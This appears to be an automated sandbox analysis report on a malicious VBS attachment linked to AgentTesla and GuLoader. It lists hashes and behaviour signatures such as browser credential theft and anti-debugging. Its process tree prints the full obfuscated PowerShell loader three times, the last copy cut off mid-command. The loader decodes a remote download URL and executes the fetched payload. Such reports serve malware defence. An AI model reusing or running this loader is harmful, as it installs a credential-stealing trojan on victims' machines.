Overview

overview

10

Static

static

1

Justificante_1305.vbs

windows7-x64

10

Justificante_1305.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-09-2024 13:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Justificante_1305.vbs

  • Size

    19KB

  • MD5

    9b1f7ea12daa77c87447f05ff1ac6f5e

  • SHA1

    58d9c2cb1c146a81412a308d1c6b6b8b6e31f1a4

  • SHA256

    2e98277dc23d49726e32785822944fd82ad43068321e1b5ee7e5d1d8a8bc1bbc

  • SHA512

    035a86675229744b63b5f0974164e12e6934a35074f59986b232bf4c6acda245bca34982b8c649ac934659e6af0e8e33ed7b049c58bda787ba9277956c06114b

  • SSDEEP

    384:pQ3GOmBsxCnn+8jZHMfOOoq76ITBJQcO5I4xDIeiAD2F7sGk:639cs8n+0ej2OBJQczIT1

Score
10/10
agentteslaguloadercredential_accessdiscoverydownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 3 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Justificante_1305.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subbrigade Flleshusene Forskningsministeriet genlsere #>;$Overheatedly='Machairodont';<#Erhvervsevne Inkassogebyr Prelegislative Eksportaktiviteternes Diebrnenes Mouseion Passagerskib #>;$Reselects=$host.PrivateData;If ($Reselects) {$Stylized++;}function Vigils202($Barryggenes){$Blankversenes=$Barryggenes.Length-$Stylized;for( $Sommerlejrene=4;$Sommerlejrene -lt $Blankversenes;$Sommerlejrene+=5){$Presseetikken+=$Barryggenes[$Sommerlejrene];}$Presseetikken;}function Fanklubbernes($Dvlende153){ . ($Trusseredere) ($Dvlende153);}$dentalmen=Vigils202 ' .xtMS luoThrezrodoiSlmnlTar,ljd,kaSkyg/Su e5Aars.Fler0 Pie Un.n(AdvaWIseniIn enmi id peroVi,iw NoesUpgr AmtsN BatTPero log1Udmr0 Squ. S.b0lege;bagn UsurWHenhiUfo nRi k6L gh4 eli;fu t ko.mxRero6 Dyr4 Cen;R li Tilr.rusvReso:Vapo1Newy2Flet1wagg.A.me0Kahy)Rums EnvG me eKonecDiplkRigooTria/Simo2 Ros0Pene1Atti0 Reg0Dame1Harp0Li i1 Hos De,mFPladiAdgarJasyeklejfTectosp exN tr/Re n1 rd2Fogg1Vers.Krys0 Pu. ';$Meddelelseshemmeligheds=Vigils202 'Trolu FlaS.lubETridr,eak- parA emeGSeb.e Hern AkaTDis ';$Aflejringerne=Vigils202 'Br,shEksptDoktt TanpShebs nva:Fort/Kaya/PolydLimprR keiRacevConve U c. behgSon oflyvo RemgB nalAd eeSoli.SupecAskeoPedamSky /,oveu morc Kr ? ArgeDecax Forp Me,oRangrTheatForl=alcodKemoo LuswUnden.ordlUnmeoNoneaembadUnho& auiAffrd Gi =S or1 Li lFlacMmu iwNonaX Fi ooktef hee7,lve5 Ret-B mpu sel0Leig_Tripv uvXDila_Hjem6roquuLingcRomaJTempa.nkeKTra,VN ldkSa aCRaasy Fors GalbBran1T,lk-IncofOpg 2opis7Bush ';$Advertizes=Vigils202 'svrt>Rigs ';$Trusseredere=Vigils202 'Vin,IEnamETer xTria ';$Selines2='Obreptitious204';$Kufferten = Vigils202 ' scoeUndecKl.nh G mo R a Livg%Sp ka agp Unep Sald ebaa JoytObsta Jo %Maks\E igPArgloFormttvanb LopoSa,ai He l,jmoeRedrdEmpe.SlutAosu,s Un yPhan tail& Kol&T nk Mu.eWag c ymbhTtnio .ra Arrt lli ';Fanklubbernes (Vigils202 'Noni$mph gSammlPeo.o lenbForda I.olSkld:PertSNverpPepsr Ea g KaleArkibSenaiHeats Rest ktnHebeiHe lnd omgTr leCentnUnins ree= ill(Reklc .emmForfdFore Slov/Cyanc Adk N l$ClouKSalmuKaldf Skmfprese N nrForttUnb eF den,amp)Phen ');Fanklubbernes (Vigils202 'Ured$RetagSkyglYohooShorbDdsaa NvnlCont:Ld,dA emkdGalumEks i alknKnuriTotac lkau illfolkagenerKlasy ffr= Kul$ZombAunf.fCa.ol SereAmmoj StjrSlr iFremnN,wegVarseMillrNoncnHelte neb.py osAnagpMudil Jeni Irit.ome(Muse$Und,AEcondEftevAs oeUn,srUnhut ModiBrilz.krme ynksKn,v) Par ');Fanklubbernes (Vigils202 'Paxt[Se aNVanieHje t Eru. Un Sbenee Snor TopvMenui H dcvaleeSpioP KosoaberiPan,n In t UidMbutyaKillnHu maGemwgAffaeVan rKond] L,d:Galv: StoSDrejeBes c GiouAdrerMo,piMilitNoniyNontPNo srDoksoTrantRrsaoUs acOrthoOrdrl,emi arm= Fje Aftr[ChelNs,ste Altt et.tranSN nheVigacSkrauS oor,endiRundtAflbyDagpPProgr UdpoS oltFlugo M,lcAl ooInsploketTSoegyAppepAmbleTe n]Syli:Sl s:DataTKuldl Pros R m1Crus2 Sky ');$Aflejringerne=$Adminiculary[0];$Reversify= (Vigils202 '.ndv$MedigDry lA.svoPaahB usiAent.lPara:LullFTen IPreisAp.lhAnism AdvO GisnKundGSla E InoR Roe8Be l3Sah =UppinRi gE,aanWGuld-AfteOunfrBAutojKbeneManucPlatTReca YalesJagtYfra,SAffatPro EP.asm,nos. M,nNwessE styT ys.D ypwpresEDe.ib A,scPourlLeveIIdioe,parN reT');$Reversify+=$Sprgebistningens[1];Fanklubbernes ($Reversify);Fanklubbernes (Vigils202 'Sydn$ IntFT ani ipusUni,hReprmVivcoDepinB,mog BideUnder Pte8 ont3Sens.DyveHForteDk,iaHydrd.regeVentr ,rus Kla[,ona$ShanMOphieGraddCochd toeSubslStikeOpsplTaksssvove A vsSkrkh Blte ejsmNon m Ge eF,rolFllei limg ,orhBrude Whodsours Aes]Time=B.sg$Inh dSndeeG lonGyratTethaCat lPe,vmantieBiscn Moo ');$Sidestillendes=Vigils202 'Hors$PoetFS.rii Af.sAto,hFastmxiivoGrydnFozig Weae uksr Pla8Fyr 3Malk.RebuDFluso rigwDermnCi,dlIrreobeyoaGramdBeskFUltriVskelStafeManu(Baci$KlagAFrizfPolyl BeaeOverjT ttrLiniiDetenDyrkgSneeeScaprDannn ateeE bo,Cixi$ScarsD,vaaSesqgProdnArguoVkkemToadsO.sepDooduDiabnEx udM srnTrafeSates ppl)Nati ';$sagnomspundnes=$Sprgebistningens[0];Fanklubbernes (Vigils202 'Tort$ HarG Lapl PopolibbbBanaAOverLAlbi:FutuLfiloAD,ifFTranGGuntI SelFTegnt JeaEStudnAnmo2Cafe3 P.a2F br=Sikk( C lT toweElecsD mitSh.r-Re pP,omuACamptR seHIn e S.ur$DiabSI peAOlieGInstn anzO.ilamL,llsBodePStvnuD,msNDi pdVaren ,nceS hosSupe)Homo ');while (!$Lafgiften232) {Fanklubbernes (Vigils202 'Pe e$unafgConclTranoEvenb maraCynol ono:ImpeGMyrmrStb u ousnV rkd RantSordv PesiFrdigE doi.allaLovenT aceF,edrDagseEskan Cyp=reta$Ann tPuncrReneu T,aeFlad ') ;Fanklubbernes $Sidestillendes;Fanklubbernes (Vigils202 'p,okSMilatPho,aShivrStegt old- TraS S llKrise rsteth,cpV,gi Come4Vejr ');Fanklubbernes (Vigils202 'Assu$PacugNigrl emo PribPladaC umlRepr:AccoLBenzaIndsfKlevgCalliHumifEpiptOvereGo.dnStri2Emba3Orie2Pola= Thr(M jkTUnree .nos nbtPol,-afv.PWelsaEl.ktOnchhPrag Mys$ ,pas NonaAdopgReh nA beoAndrmAandsZoacpRdalu Id nEl kdAfsknEksted,tisscat)Gyro ') ;Fanklubbernes (Vigils202 ' cap$ unwgR,til LudoSensbStimaStjalResh: QuaaPerifNul,f Hane PrekTopbt.odwas trtDisaiM llo ogindivu=U jo$Analg nudlE uiob rkb Te.aUnarl Epi:Gle BVersaKi,irudtobo,sce ediiGlunrWattoUfat+ fot+ Pas%My.e$Is cA Badd GnimdaguiBa an jvli ndc Sm uUdaal LazaSterrunreyIken.Dobbc TesoDiknu BorncitrtA,ns ') ;$Aflejringerne=$Adminiculary[$affektation];}$spirt=326747;$Skibshandlerens=29164;Fanklubbernes (Vigils202 'T pp$OpgagMaealSivsoStadb Seia.eptlM,ng: anOTapexTh ri Ldrd CitaEffesStateL,so8 Ac.9Over Wrai= Pop EnsiGBnnee,ialtNiss-MannCBrudoGathn dudt oweeSnicn I tt D,k isc $FerisFoppaUdelgBon.nFlotoDiacmTr.gsAppapGoveue tinRugadg stnPaa.e AbusLiby ');Fanklubbernes (Vigils202 'S.or$MitigInsplGardo esebU unaS,enl Bas:LgneACoqul It b olla umnBag sSkovkAdse phly= dir For[MargSWillyGladsAfl tSeedeUnacm.ach.B,siC ndmoBandnSt bvArmueBa,gr Pr,t Bis] ran:Brob: FolFDi trReteo perminddBYlahaTeonsMonteSubt6Em a4Rep.SAlemtGentrMiljiStoinDun gMaib( Sus$Cr.dO lasx SpriAn.idS peaVarisou reBegi8 Bro9,eno)Afp ');Fanklubbernes (Vigils202 'symp$RevugVarelFr toYerebVartaArgol Kap: eryMMousaB anlGroskSk vnTresiB nynCyligHatcePracrV cksUkl D,a= as Svas[su cSClinyId osNonetPraeestarmGam .NecrTRacheA tixDygttTu.b.FlukE O fnUndecTospoUensd liviUn un T,ngBill]Bli.:Reel:Spa ABrecSG leC undIHalvIEngr.BetoG paeP yltPseuSDalrt.rotrTfleiPsycnIndag Nab( Dan$ skrAsnorlRumpbIntea.ptrnPe,tsF,mek Est)Klo ');Fanklubbernes (Vigils202 'Nonb$EftegRoutl Ho,oAf eb Udga AfslFads:BhutA G.yrLserc enko vers at=Tilb$R omMSolvaHumol dy,kgaldnBarkiD,adnIrreg,otae scerVaclsSemi.Gelis Te uTirsb pysSoott,ailrBraniTi.sn Papg Ma (Jara$SparsBratp resiEphyr,eigt Ten,Vort$ H lSPulmk UnaiProcbUbess AfthOli aDis nOv rdLegil PraeUndvrBsteePerenPrers .ip)Synd ');Fanklubbernes $Arcos;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Potboiled.Asy && echo t"
        3⤵
          PID:2068
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Subbrigade Flleshusene Forskningsministeriet genlsere #>;$Overheatedly='Machairodont';<#Erhvervsevne Inkassogebyr Prelegislative Eksportaktiviteternes Diebrnenes Mouseion Passagerskib #>;$Reselects=$host.PrivateData;If ($Reselects) {$Stylized++;}function Vigils202($Barryggenes){$Blankversenes=$Barryggenes.Length-$Stylized;for( $Sommerlejrene=4;$Sommerlejrene -lt $Blankversenes;$Sommerlejrene+=5){$Presseetikken+=$Barryggenes[$Sommerlejrene];}$Presseetikken;}function Fanklubbernes($Dvlende153){ . ($Trusseredere) ($Dvlende153);}$dentalmen=Vigils202 ' .xtMS luoThrezrodoiSlmnlTar,ljd,kaSkyg/Su e5Aars.Fler0 Pie Un.n(AdvaWIseniIn enmi id peroVi,iw NoesUpgr AmtsN BatTPero log1Udmr0 Squ. S.b0lege;bagn UsurWHenhiUfo nRi k6L gh4 eli;fu t ko.mxRero6 Dyr4 Cen;R li Tilr.rusvReso:Vapo1Newy2Flet1wagg.A.me0Kahy)Rums EnvG me eKonecDiplkRigooTria/Simo2 Ros0Pene1Atti0 Reg0Dame1Harp0Li i1 Hos De,mFPladiAdgarJasyeklejfTectosp exN tr/Re n1 rd2Fogg1Vers.Krys0 Pu. ';$Meddelelseshemmeligheds=Vigils202 'Trolu FlaS.lubETridr,eak- parA emeGSeb.e Hern AkaTDis ';$Aflejringerne=Vigils202 'Br,shEksptDoktt TanpShebs nva:Fort/Kaya/PolydLimprR keiRacevConve U c. behgSon oflyvo RemgB nalAd eeSoli.SupecAskeoPedamSky /,oveu morc Kr ? ArgeDecax Forp Me,oRangrTheatForl=alcodKemoo LuswUnden.ordlUnmeoNoneaembadUnho& auiAffrd Gi =S or1 Li lFlacMmu iwNonaX Fi ooktef hee7,lve5 Ret-B mpu sel0Leig_Tripv uvXDila_Hjem6roquuLingcRomaJTempa.nkeKTra,VN ldkSa aCRaasy Fors GalbBran1T,lk-IncofOpg 2opis7Bush ';$Advertizes=Vigils202 'svrt>Rigs ';$Trusseredere=Vigils202 'Vin,IEnamETer xTria ';$Selines2='Obreptitious204';$Kufferten = Vigils202 ' scoeUndecKl.nh G mo R a Livg%Sp ka agp Unep Sald ebaa JoytObsta Jo %Maks\E igPArgloFormttvanb LopoSa,ai He l,jmoeRedrdEmpe.SlutAosu,s Un yPhan tail& Kol&T nk Mu.eWag c ymbhTtnio .ra Arrt lli ';Fanklubbernes (Vigils202 'Noni$mph gSammlPeo.o lenbForda I.olSkld:PertSNverpPepsr Ea g KaleArkibSenaiHeats Rest ktnHebeiHe lnd omgTr leCentnUnins ree= ill(Reklc .emmForfdFore Slov/Cyanc Adk N l$ClouKSalmuKaldf Skmfprese N nrForttUnb eF den,amp)Phen ');Fanklubbernes (Vigils202 'Ured$RetagSkyglYohooShorbDdsaa NvnlCont:Ld,dA emkdGalumEks i alknKnuriTotac lkau illfolkagenerKlasy ffr= Kul$ZombAunf.fCa.ol SereAmmoj StjrSlr iFremnN,wegVarseMillrNoncnHelte neb.py osAnagpMudil Jeni Irit.ome(Muse$Und,AEcondEftevAs oeUn,srUnhut ModiBrilz.krme ynksKn,v) Par ');Fanklubbernes (Vigils202 'Paxt[Se aNVanieHje t Eru. Un Sbenee Snor TopvMenui H dcvaleeSpioP KosoaberiPan,n In t UidMbutyaKillnHu maGemwgAffaeVan rKond] L,d:Galv: StoSDrejeBes c GiouAdrerMo,piMilitNoniyNontPNo srDoksoTrantRrsaoUs acOrthoOrdrl,emi arm= Fje Aftr[ChelNs,ste Altt et.tranSN nheVigacSkrauS oor,endiRundtAflbyDagpPProgr UdpoS oltFlugo M,lcAl ooInsploketTSoegyAppepAmbleTe n]Syli:Sl s:DataTKuldl Pros R m1Crus2 Sky ');$Aflejringerne=$Adminiculary[0];$Reversify= (Vigils202 '.ndv$MedigDry lA.svoPaahB usiAent.lPara:LullFTen IPreisAp.lhAnism AdvO GisnKundGSla E InoR Roe8Be l3Sah =UppinRi gE,aanWGuld-AfteOunfrBAutojKbeneManucPlatTReca YalesJagtYfra,SAffatPro EP.asm,nos. M,nNwessE styT ys.D ypwpresEDe.ib A,scPourlLeveIIdioe,parN reT');$Reversify+=$Sprgebistningens[1];Fanklubbernes ($Reversify);Fanklubbernes (Vigils202 'Sydn$ IntFT ani ipusUni,hReprmVivcoDepinB,mog BideUnder Pte8 ont3Sens.DyveHForteDk,iaHydrd.regeVentr ,rus Kla[,ona$ShanMOphieGraddCochd toeSubslStikeOpsplTaksssvove A vsSkrkh Blte ejsmNon m Ge eF,rolFllei limg ,orhBrude Whodsours Aes]Time=B.sg$Inh dSndeeG lonGyratTethaCat lPe,vmantieBiscn Moo ');$Sidestillendes=Vigils202 'Hors$PoetFS.rii Af.sAto,hFastmxiivoGrydnFozig Weae uksr Pla8Fyr 3Malk.RebuDFluso rigwDermnCi,dlIrreobeyoaGramdBeskFUltriVskelStafeManu(Baci$KlagAFrizfPolyl BeaeOverjT ttrLiniiDetenDyrkgSneeeScaprDannn ateeE bo,Cixi$ScarsD,vaaSesqgProdnArguoVkkemToadsO.sepDooduDiabnEx udM srnTrafeSates ppl)Nati ';$sagnomspundnes=$Sprgebistningens[0];Fanklubbernes (Vigils202 'Tort$ HarG Lapl PopolibbbBanaAOverLAlbi:FutuLfiloAD,ifFTranGGuntI SelFTegnt JeaEStudnAnmo2Cafe3 P.a2F br=Sikk( C lT toweElecsD mitSh.r-Re pP,omuACamptR seHIn e S.ur$DiabSI peAOlieGInstn anzO.ilamL,llsBodePStvnuD,msNDi pdVaren ,nceS hosSupe)Homo ');while (!$Lafgiften232) {Fanklubbernes (Vigils202 'Pe e$unafgConclTranoEvenb maraCynol ono:ImpeGMyrmrStb u ousnV rkd RantSordv PesiFrdigE doi.allaLovenT aceF,edrDagseEskan Cyp=reta$Ann tPuncrReneu T,aeFlad ') ;Fanklubbernes $Sidestillendes;Fanklubbernes (Vigils202 'p,okSMilatPho,aShivrStegt old- TraS S llKrise rsteth,cpV,gi Come4Vejr ');Fanklubbernes (Vigils202 'Assu$PacugNigrl emo PribPladaC umlRepr:AccoLBenzaIndsfKlevgCalliHumifEpiptOvereGo.dnStri2Emba3Orie2Pola= Thr(M jkTUnree .nos nbtPol,-afv.PWelsaEl.ktOnchhPrag Mys$ ,pas NonaAdopgReh nA beoAndrmAandsZoacpRdalu Id nEl kdAfsknEksted,tisscat)Gyro ') ;Fanklubbernes (Vigils202 ' cap$ unwgR,til LudoSensbStimaStjalResh: QuaaPerifNul,f Hane PrekTopbt.odwas trtDisaiM llo ogindivu=U jo$Analg nudlE uiob rkb Te.aUnarl Epi:Gle BVersaKi,irudtobo,sce ediiGlunrWattoUfat+ fot+ Pas%My.e$Is cA Badd GnimdaguiBa an jvli ndc Sm uUdaal LazaSterrunreyIken.Dobbc TesoDiknu BorncitrtA,ns ') ;$Aflejringerne=$Adminiculary[$affektation];}$spirt=326747;$Skibshandlerens=29164;Fanklubbernes (Vigils202 'T pp$OpgagMaealSivsoStadb Seia.eptlM,ng: anOTapexTh ri Ldrd CitaEffesStateL,so8 Ac.9Over Wrai= Pop EnsiGBnnee,ialtNiss-MannCBrudoGathn dudt oweeSnicn I tt D,k isc $FerisFoppaUdelgBon.nFlotoDiacmTr.gsAppapGoveue tinRugadg stnPaa.e AbusLiby ');Fanklubbernes (Vigils202 'S.or$MitigInsplGardo esebU unaS,enl Bas:LgneACoqul It b olla umnBag sSkovkAdse phly= dir For[MargSWillyGladsAfl tSeedeUnacm.ach.B,siC ndmoBandnSt bvArmueBa,gr Pr,t Bis] ran:Brob: FolFDi trReteo perminddBYlahaTeonsMonteSubt6Em a4Rep.SAlemtGentrMiljiStoinDun gMaib( Sus$Cr.dO lasx SpriAn.idS peaVarisou reBegi8 Bro9,eno)Afp ');Fanklubbernes (Vigils202 'symp$RevugVarelFr toYerebVartaArgol Kap: eryMMousaB anlGroskSk vnTresiB nynCyligHatcePracrV cksUkl D,a= as Svas[su cSClinyId osNonetPraeestarmGam .NecrTRacheA tixDygttTu.b.FlukE O fnUndecTospoUensd liviUn un T,ngBill]Bli.:Reel:Spa ABrecSG leC undIHalvIEngr.BetoG paeP yltPseuSDalrt.rotrTfleiPsycnIndag Nab( Dan$ skrAsnorlRumpbIntea.ptrnPe,tsF,mek Est)Klo ');Fanklubbernes (Vigils202 'Nonb$EftegRoutl Ho,oAf eb Udga AfslFads:BhutA G.yrLserc enko vers at=Tilb$R omMSolvaHumol dy,kgaldnBarkiD,adnIrreg,otae scerVaclsSemi.Gelis Te uTirsb pysSoott,ailrBraniTi.sn Papg Ma (Jara$SparsBratp resiEphyr,eigt Ten,Vort$ H lSPulmk UnaiProcbUbess AfthOli aDis nOv rdLegil PraeUndvrBsteePerenPrers .ip)Synd ');Fanklubbernes $Arcos;"
          3⤵
          • Network Service Discovery
          • Suspicious use of WriteProcessMemory
          PID:2664
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Subbrigade Flleshusene Forskningsministeriet genlsere #>;$Overheatedly='Machairodont';<#Erhvervsevne Inkassogebyr Prelegislative Eksportaktiviteternes Diebrnenes Mouseion Passagerskib #>;$Reselects=$host.PrivateData;If ($Reselects) {$Stylized++;}function Vigils202($Barryggenes){$Blankversenes=$Barryggenes.Length-$Stylized;for( $Sommerlejrene=4;$Sommerlejrene -lt $Blankversenes;$Sommerlejrene+=5){$Presseetikken+=$Barryggenes[$Sommerlejrene];}$Presseetikken;}function Fanklubbernes($Dvlende153){ . ($Trusseredere) ($Dvlende153);}$dentalmen=Vigils202 ' .xtMS luoThrezrodoiSlmnlTar,ljd,kaSkyg/Su e5Aars.Fler0 Pie Un.n(AdvaWIseniIn enmi id peroVi,iw NoesUpgr AmtsN BatTPero log1Udmr0 Squ. S.b0lege;bagn UsurWHenhiUfo nRi k6L gh4 eli;fu t ko.mxRero6 Dyr4 Cen;R li Tilr.rusvReso:Vapo1Newy2Flet1wagg.A.me0Kahy)Rums EnvG me eKonecDiplkRigooTria/Simo2 Ros0Pene1Atti0 Reg0Dame1Harp0Li i1 Hos De,mFPladiAdgarJasyeklejfTectosp exN tr/Re n1 rd2Fogg1Vers.Krys0 Pu. ';$Meddelelseshemmeligheds=Vigils202 'Trolu FlaS.lubETridr,eak- parA emeGSeb.e Hern AkaTDis ';$Aflejringerne=Vigils202 'Br,shEksptDoktt TanpShebs nva:Fort/Kaya/PolydLimprR keiRacevConve U c. behgSon oflyvo RemgB nalAd eeSoli.SupecAskeoPedamSky /,oveu morc Kr ? ArgeDecax Forp Me,oRangrTheatForl=alcodKemoo LuswUnden.ordlUnmeoNoneaembadUnho& auiAffrd Gi =S or1 Li lFlacMmu iwNonaX Fi ooktef hee7,lve5 Ret-B mpu sel0Leig_Tripv uvXDila_Hjem6roquuLingcRomaJTempa.nkeKTra,VN ldkSa aCRaasy Fors GalbBran1T,lk-IncofOpg 2opis7Bush ';$Advertizes=Vigils202 'svrt>Rigs ';$Trusseredere=Vigils202 'Vin,IEnamETer xTria ';$Selines2='Obreptitious204';$Kufferten = Vigils202 ' scoeUndecKl.nh G mo R a Livg%Sp ka agp Unep Sald ebaa JoytObsta Jo %Maks\E igPArgloFormttvanb LopoSa,ai He l,jmoeRedrdEmpe.SlutAosu,s Un yPhan tail& Kol&T nk Mu.eWag c ymbhTtnio .ra Arrt lli ';Fanklubbernes (Vigils202 'Noni$mph gSammlPeo.o lenbForda I.olSkld:PertSNverpPepsr Ea g KaleArkibSenaiHeats Rest ktnHebeiHe lnd omgTr leCentnUnins ree= ill(Reklc .emmForfdFore Slov/Cyanc Adk N l$ClouKSalmuKaldf Skmfprese N nrForttUnb eF den,amp)Phen ');Fanklubbernes (Vigils202 'Ured$RetagSkyglYohooShorbDdsaa NvnlCont:Ld,dA emkdGalumEks i alknKnuriTotac lkau illfolkagenerKlasy ffr= Kul$ZombAunf.fCa.ol SereAmmoj StjrSlr iFremnN,wegVarseMillrNoncnHelte neb.py osAnagpMudil Jeni Irit.ome(Muse$Und,AEcondEftevAs oeUn,srUnhut ModiBrilz.krme ynksKn,v) Par ');Fanklubbernes (Vigils202 'Paxt[Se aNVanieHje t Eru. Un Sbenee Snor TopvMenui H dcvaleeSpioP KosoaberiPan,n In t UidMbutyaKillnHu maGemwgAffaeVan rKond] L,d:Galv: StoSDrejeBes c GiouAdrerMo,piMilitNoniyNontPNo srDoksoTrantRrsaoUs acOrthoOrdrl,emi arm= Fje Aftr[ChelNs,ste Altt et.tranSN nheVigacSkrauS oor,endiRundtAflbyDagpPProgr UdpoS oltFlugo M,lcAl ooInsploketTSoegyAppepAmbleTe n]Syli:Sl s:DataTKuldl Pros R m1Crus2 Sky ');$Aflejringerne=$Adminiculary[0];$Reversify= (Vigils202 '.ndv$MedigDry lA.svoPaahB usiAent.lPara:LullFTen IPreisAp.lhAnism AdvO GisnKundGSla E InoR Roe8Be l3Sah =UppinRi gE,aanWGuld-AfteOunfrBAutojKbeneManucPlatTReca YalesJagtYfra,SAffatPro EP.asm,nos. M,nNwessE styT ys.D ypwpresEDe.ib A,scPourlLeveIIdioe,parN reT');$Reversify+=$Sprgebistningens[1];Fanklubbernes ($Reversify);Fanklubbernes (Vigils202 'Sydn$ IntFT ani ipusUni,hReprmVivcoDepinB,mog BideUnder Pte8 ont3Sens.DyveHForteDk,iaHydrd.regeVentr ,rus Kla[,ona$ShanMOphieGraddCochd toeSubslStikeOpsplTaksssvove A vsSkrkh Blte ejsmNon m Ge eF,rolFllei limg ,orhBrude Whodsours Aes]Time=B.sg$Inh dSndeeG lonGyratTethaCat lPe,vmantieBiscn Moo ');$Sidestillendes=Vigils202 'Hors$PoetFS.rii Af.sAto,hFastmxiivoGrydnFozig Weae uksr Pla8Fyr 3Malk.RebuDFluso rigwDermnCi,dlIrreobeyoaGramdBeskFUltriVskelStafeManu(Baci$KlagAFrizfPolyl BeaeOverjT ttrLiniiDetenDyrkgSneeeScaprDannn ateeE bo,Cixi$ScarsD,vaaSesqgProdnArguoVkkemToadsO.sepDooduDiabnEx udM srnTrafeSates ppl)Nati ';$sagnomspundnes=$Sprgebistningens[0];Fanklubbernes (Vigils202 'Tort$ HarG Lapl PopolibbbBanaAOverLAlbi:FutuLfiloAD,ifFTranGGuntI SelFTegnt JeaEStudnAnmo2Cafe3 P.a2F br=Sikk( C lT toweElecsD mitSh.r-Re pP,omuACamptR seHIn e S.ur$DiabSI peAOlieGInstn anzO.ilamL,llsBodePStvnuD,msNDi pdVaren ,nceS hosSupe)Homo ');while (!$Lafgiften232) {Fanklubbernes (Vigils202 'Pe e$unafgConclTranoEvenb maraCynol ono:ImpeGMyrmrStb u ousnV rkd RantSordv PesiFrdigE doi.allaLovenT aceF,edrDagseEskan Cyp=reta$Ann tPuncrReneu T,aeFlad ') ;Fanklubbernes $Sidestillendes;Fanklubbernes (Vigils202 'p,okSMilatPho,aShivrStegt old- TraS S llKrise rsteth,cpV,gi Come4Vejr ');Fanklubbernes (Vigils202 'Assu$PacugNigrl emo PribPladaC umlRepr:AccoLBenzaIndsfKlevgCalliHumifEpiptOvereGo.dnStri2Emba3Orie2Pola= Thr(M jkTUnree .nos nbtPol,-afv.PWelsaEl.ktOnchhPrag Mys$ ,pas NonaAdopgReh nA beoAndrmAandsZoacpRdalu Id nEl kdAfsknEksted,tisscat)Gyro ') ;Fanklubbernes (Vigils202 ' cap$ unwgR,til LudoSensbStimaStjalResh: QuaaPerifNul,f Hane PrekTopbt.odwas trtDisaiM llo ogindivu=U jo$Analg nudlE uiob rkb Te.aUnarl Epi:Gle BVersaKi,irudtobo,sce ediiGlunrWattoUfat+ fot+ Pas%My.e$Is cA Badd GnimdaguiBa an jvli ndc Sm uUdaal LazaSterrunreyIken.Dobbc TesoDiknu BorncitrtA,ns ') ;$Aflejringerne=$Adminiculary[$affektation];}$spirt=326747;$Skibshandlerens=29164;Fanklubbernes (Vigils202 'T pp$OpgagMaealSivsoStadb Seia.eptlM,ng: anOTapexTh ri Ldrd CitaEffesStateL,so8 Ac.9Over Wrai= Pop EnsiGBnnee,ialtNiss-MannCBrudoGathn dudt oweeSnicn I tt D,k isc $FerisFoppaUdelgBon.nFlotoDiacmTr.gsAppapGoveue tinRugadg stnPaa.e AbusLiby ');Fanklubbernes (Vigils202 'S.or$MitigInsplGardo esebU unaS,enl Bas:LgneACoqul It b olla umnBag sSkovkAdse phly= dir For[MargSWillyGladsAfl tSeedeUnacm.ach.B,siC ndmoBandnSt bvArmueBa,gr Pr,t Bis] ran:Brob: FolFDi trReteo perminddBYlahaTeonsMonteSubt6Em a4Rep.SAlemtGentrMiljiStoinDun gMaib( Sus$Cr.dO lasx SpriAn.idS peaVarisou reBegi8 Bro9,eno)Afp ');Fanklubbernes (Vigils202 'symp$RevugVarelFr toYerebVartaArgol Kap: eryMMousaB anlGroskSk vnTresiB nynCyligHatcePracrV cksUkl D,a= as Svas[su cSClinyId osNonetPraeestarmGam .NecrTRacheA tixDygttTu.b.FlukE O fnUndecTospoUensd liviUn un T,ngBill]Bli.:Reel:Spa ABrecSG leC undIHalvIEngr.BetoG paeP yltPseuSDalrt.rotrTfleiPsycnIndag Nab( Dan$ skrAsnorlRumpbIntea.ptrnPe,tsF,mek Est)Klo ');Fanklubbernes (Vigils202 'Nonb$EftegRoutl Ho,oAf eb Udga AfslFads:BhutA G.yrLserc enko vers at=Tilb$R omMSolvaHumol dy,kgaldnBarkiD,adnIrreg,otae 